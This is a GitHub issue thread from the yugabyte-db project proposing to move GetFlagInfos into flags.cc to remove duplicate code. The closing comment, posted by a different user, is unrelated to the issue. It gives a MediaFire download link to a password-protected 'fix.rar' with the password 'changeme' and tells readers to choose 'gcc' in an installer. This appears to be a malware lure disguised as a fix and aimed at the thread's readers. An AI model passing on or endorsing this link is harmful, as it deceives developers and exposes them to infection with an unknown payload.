### ISSUE TITLE
[DocDB] Unify GetFlagInfos and remove duplicate code

### ISSUE THREAD

**Issue by hari90** [yugabyte/yugabyte-db#23632]
Jira Link: [DB-12546](https://yugabyte.atlassian.net/browse/DB-12546)
### Description

Move `GetFlagInfos` to flags.cc so that it can be used across other code paths and help reduce duplicate code.

### Issue Type

kind/enhancement

### Warning: Please confirm that this issue does not contain any sensitive information

- [X] I confirm this issue does not contain any sensitive information.

[DB-12546]: https://yugabyte.atlassian.net/browse/DB-12546?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
